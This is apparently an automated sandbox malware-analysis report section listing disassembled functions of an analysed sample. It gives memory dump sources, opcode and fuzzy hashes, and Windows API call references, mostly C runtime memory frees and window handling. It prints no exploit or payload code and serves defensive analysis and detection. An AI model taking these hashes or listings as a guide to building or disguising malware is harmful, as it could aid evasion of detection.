                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1aa81a96771e34a2f1185bb708c58f2bd6fdc0a61f270941e9d7233dfc2109af
                                                                                      • Instruction ID: 086723e7e7a2f43a2df10a75b90f29d17d9696728920689c71771e8faa1de5db
                                                                                      • Opcode Fuzzy Hash: 1aa81a96771e34a2f1185bb708c58f2bd6fdc0a61f270941e9d7233dfc2109af
                                                                                      • Instruction Fuzzy Hash: E9E10279508380CFC744CF69D89086BBFE0AF9A300F49499EF9D597362C235EA15CB62
                                                                                      Function 00D82DB5 Relevance: .3, Instructions: 263COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                      • Instruction ID: ceddad99848f5ddb42788543cc949208b0d34b58bb67c5f26ec7f066e205b95d
                                                                                      • Opcode Fuzzy Hash: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                      • Instruction Fuzzy Hash: 289144B02043498BD724FF28C895BBE73D5EF90304F14092DFA9A87282EAB5D644C772
                                                                                      Function 00D830E6 Relevance: .2, Instructions: 232COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                      • Instruction ID: 947f8079ca3ee8ee398b7836297a56b1839cbb3c3e6c70600108c3a4ae1daa1e
                                                                                      • Opcode Fuzzy Hash: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                      • Instruction Fuzzy Hash: 977116703043855BDB24FE2CC8D4BBD37D5EB91B04F04492DE9CE8B282DA64DA858776
                                                                                      Function 00D7D1D2 Relevance: .2, Instructions: 190COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a31a3ad20bdf7c7adb6c38f20c833b99c9169288d8a4d2bc9584846d122bdad2
                                                                                      • Instruction ID: a354e845f688785f1b86e38e9b82fa73422a6c81fc3d76f4f0c40fe175476bf1
                                                                                      • Opcode Fuzzy Hash: a31a3ad20bdf7c7adb6c38f20c833b99c9169288d8a4d2bc9584846d122bdad2
                                                                                      • Instruction Fuzzy Hash: 5281699221A3E4DEC7068F7D38E12A63FA15B77341B1C45EAD4C9C63A3D0368658D732
                                                                                      Function 00D7DBE2 Relevance: .2, Instructions: 154COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b3036133b6873920d7fc096f064eea942826220dd337e16d39074bf4959c9d45
                                                                                      • Instruction ID: e8ed089747fab9a200e7b948e3c55516cbfd8ecef8e2dc235cf87782b5fd5925
                                                                                      • Opcode Fuzzy Hash: b3036133b6873920d7fc096f064eea942826220dd337e16d39074bf4959c9d45
                                                                                      • Instruction Fuzzy Hash: 6A51B1755083954EC712CF29818046EFFF2AFDA324F59889EE4D94B253E131D68ACB72
                                                                                      Function 00D7EC97 Relevance: .1, Instructions: 131COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 712b47844835fa79a0d26d4dc441fcf4e6f233e594f9de3282eb9cd18444a76e
                                                                                      • Instruction ID: d3ad05175b3dd82531e37c154815368abcea74fb79c3b11f5a3b49fc7d1110dc
                                                                                      • Opcode Fuzzy Hash: 712b47844835fa79a0d26d4dc441fcf4e6f233e594f9de3282eb9cd18444a76e
                                                                                      • Instruction Fuzzy Hash: AD512571A083028FC748CF19D48059AF7E1FFC8314F058A2EE899A7741DB34EA59CB96
                                                                                      Function 00D82B3A Relevance: .1, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                                                                      • Instruction ID: dedce68b5fcb73180aaf93f4b973d612098d24ae4785eddcdd0178d251750ad2
                                                                                      • Opcode Fuzzy Hash: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                                                                      • Instruction Fuzzy Hash: 8A31E1B16047498FCB14EF28C85126EBBE0FB95704F04892DE4DAD7341D679E909CB72
                                                                                      Function 00D75E96 Relevance: .1, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ab80a940478d0eba39db93d925698171b0af4084f0f3b9db70f112b20def3942
                                                                                      • Instruction ID: 627dfbedb4b5ff2017f221e7e991ef7f6181940bd6c134e4c8bd0229fb917949
                                                                                      • Opcode Fuzzy Hash: ab80a940478d0eba39db93d925698171b0af4084f0f3b9db70f112b20def3942
                                                                                      • Instruction Fuzzy Hash: DE219872A202655FCB08CF2DECA44367751AB87311786862FEA46CB395C635E925CBB0
                                                                                      Function 00D9958D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___free_lconv_mon.LIBCMT ref: 00D995D1
                                                                                        • Part of subcall function 00D9916C: _free.LIBCMT ref: 00D99189
                                                                                        • Part of subcall function 00D9916C: _free.LIBCMT ref: 00D9919B
                                                                                        • Part of subcall function 00D9916C: _free.LIBCMT ref: 00D991AD
                                                                                        • Part of subcall function 00D9916C: _free.LIBCMT ref: 00D991BF
                                                                                        • Part of subcall function 00D9916C: _free.LIBCMT ref: 00D991D1
                                                                                        • Part of subcall function 00D9916C: _free.LIBCMT ref: 00D991E3
                                                                                        • Part of subcall function 00D9916C: _free.LIBCMT ref: 00D991F5
                                                                                        • Part of subcall function 00D9916C: _free.LIBCMT ref: 00D99207
                                                                                        • Part of subcall function 00D9916C: _free.LIBCMT ref: 00D99219
                                                                                        • Part of subcall function 00D9916C: _free.LIBCMT ref: 00D9922B
                                                                                        • Part of subcall function 00D9916C: _free.LIBCMT ref: 00D9923D
                                                                                        • Part of subcall function 00D9916C: _free.LIBCMT ref: 00D9924F
                                                                                        • Part of subcall function 00D9916C: _free.LIBCMT ref: 00D99261
                                                                                      • _free.LIBCMT ref: 00D995C6
                                                                                        • Part of subcall function 00D959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?), ref: 00D959D8
                                                                                        • Part of subcall function 00D959C2: GetLastError.KERNEL32(?,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?,?), ref: 00D959EA
                                                                                      • _free.LIBCMT ref: 00D995E8
                                                                                      • _free.LIBCMT ref: 00D995FD
                                                                                      • _free.LIBCMT ref: 00D99608
                                                                                      • _free.LIBCMT ref: 00D9962A
                                                                                      • _free.LIBCMT ref: 00D9963D
                                                                                      • _free.LIBCMT ref: 00D9964B
                                                                                      • _free.LIBCMT ref: 00D99656
                                                                                      • _free.LIBCMT ref: 00D9968E
                                                                                      • _free.LIBCMT ref: 00D99695
                                                                                      • _free.LIBCMT ref: 00D996B2
                                                                                      • _free.LIBCMT ref: 00D996CA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                      • String ID:
                                                                                      • API String ID: 161543041-0
                                                                                      • Opcode ID: 5d6dbec1ba9e4b0105d689584538fe62ce3cab99dd51fad4d2b93242403b9789
                                                                                      • Instruction ID: 201c98bcd07bb35778b4fb0ba4e8d4421ffde59227093624fb8fcba7e6f5573e
                                                                                      • Opcode Fuzzy Hash: 5d6dbec1ba9e4b0105d689584538fe62ce3cab99dd51fad4d2b93242403b9789
                                                                                      • Instruction Fuzzy Hash: 0E311671604B01EFEF22AA7DE855B5AB3E9EB01320F18842DE499D7195DF35AC80CB30
                                                                                      Function 00D8B8BC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindow.USER32(?,00000005), ref: 00D8B8DD
                                                                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 00D8B90C
                                                                                        • Part of subcall function 00D80B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00D7AC49,?,?,?,00D7ABF8,?,-00000002,?,00000000,?), ref: 00D80B28
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00D8B92A
                                                                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00D8B941
                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00D8B954
                                                                                        • Part of subcall function 00D88B22: GetDC.USER32(00000000), ref: 00D88B2E
                                                                                        • Part of subcall function 00D88B22: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D88B3D
                                                                                        • Part of subcall function 00D88B22: ReleaseDC.USER32(00000000,00000000), ref: 00D88B4B
                                                                                        • Part of subcall function 00D88ADF: GetDC.USER32(00000000), ref: 00D88AEB
                                                                                        • Part of subcall function 00D88ADF: GetDeviceCaps.GDI32(00000000,00000058), ref: 00D88AFA
                                                                                        • Part of subcall function 00D88ADF: ReleaseDC.USER32(00000000,00000000), ref: 00D88B08
                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00D8B97B
                                                                                      • DeleteObject.GDI32(00000000), ref: 00D8B982
                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00D8B98B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                                                      • String ID: STATIC
                                                                                      • API String ID: 1444658586-1882779555
                                                                                      • Opcode ID: 43883a43aca56eb2a3b2b36fb149718adf703a7ce84fbadad635202a4fd15914
                                                                                      • Instruction ID: bfd6a8feb231fda944cb9cf8a0ce6db5a9fe3f33f412653d00f98daebf6d35be
                                                                                      • Opcode Fuzzy Hash: 43883a43aca56eb2a3b2b36fb149718adf703a7ce84fbadad635202a4fd15914
                                                                                      • Instruction Fuzzy Hash: B921A1726407247BEB217B68DC4AFAE766CEF05720F044112FA01E6291DB645D419BB6
                                                                                      Function 00D9622B Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00D9623F
                                                                                        • Part of subcall function 00D959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?), ref: 00D959D8
                                                                                        • Part of subcall function 00D959C2: GetLastError.KERNEL32(?,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?,?), ref: 00D959EA
                                                                                      • _free.LIBCMT ref: 00D9624B
                                                                                      • _free.LIBCMT ref: 00D96256
                                                                                      • _free.LIBCMT ref: 00D96261
                                                                                      • _free.LIBCMT ref: 00D9626C
                                                                                      • _free.LIBCMT ref: 00D96277
                                                                                      • _free.LIBCMT ref: 00D96282
                                                                                      • _free.LIBCMT ref: 00D9628D
                                                                                      • _free.LIBCMT ref: 00D96298
                                                                                      • _free.LIBCMT ref: 00D962A6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: a9715dc71deee10deec5f78f8ddce51c967e5738496683ab02a4c5a57434eb1c
                                                                                      • Instruction ID: b9ca652d8fd4e084b27483672deeb943c3494079a3a3df62fb5fc0309de2f14c
                                                                                      • Opcode Fuzzy Hash: a9715dc71deee10deec5f78f8ddce51c967e5738496683ab02a4c5a57434eb1c
                                                                                      • Instruction Fuzzy Hash: 27116376610608FFDF02EF55D842CD93BA5FF04360B5145A5BA888B226DB31EA509FA0
                                                                                      Function 00D720E6 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ;%u$x%u$xc%u
                                                                                      • API String ID: 0-2277559157
                                                                                      • Opcode ID: e2f91f3474462e01eeb7feacf37a5dc4a81f35c403c575c8858a6dbb85164c5a
                                                                                      • Instruction ID: 8095523de16f01ecfc1b012212a21f71ec41ca60c5d24d2be495d2c19dccafdd
                                                                                      • Opcode Fuzzy Hash: e2f91f3474462e01eeb7feacf37a5dc4a81f35c403c575c8858a6dbb85164c5a
                                                                                      • Instruction Fuzzy Hash: C2F116716043C05BDB19EB688895BBA7799EF94300F0C846DFC8D9B283FB249944C776
                                                                                      Function 00D9C56D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00D9CCE2,00000000,00000000,00000000,00000000,00000000,00D92C4E), ref: 00D9C5AF
                                                                                      • __fassign.LIBCMT ref: 00D9C62A
                                                                                      • __fassign.LIBCMT ref: 00D9C645
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00D9C66B
                                                                                      • WriteFile.KERNEL32(?,00000000,00000000,00D9CCE2,00000000,?,?,?,?,?,?,?,?,?,00D9CCE2,00000000), ref: 00D9C68A
                                                                                      • WriteFile.KERNEL32(?,00000000,00000001,00D9CCE2,00000000,?,?,?,?,?,?,?,?,?,00D9CCE2,00000000), ref: 00D9C6C3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                      • String ID: d0F
                                                                                      • API String ID: 1324828854-1238022483
                                                                                      • Opcode ID: 81b9d7fb2a2c6caba45aeeabb3c91c7042ccbdf62f253298c5a1cf398e06094d
                                                                                      • Instruction ID: be9ce840c2551188021c6c48a6b1fa1c922c004eed4e980157c6dc673283dabe
                                                                                      • Opcode Fuzzy Hash: 81b9d7fb2a2c6caba45aeeabb3c91c7042ccbdf62f253298c5a1cf398e06094d
                                                                                      • Instruction Fuzzy Hash: 3C51AEB1A103499FDF10CFA8D885AEEBBF8EF19300F14515AE955E7291E730A940CBB5
                                                                                      Function 00D8995F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
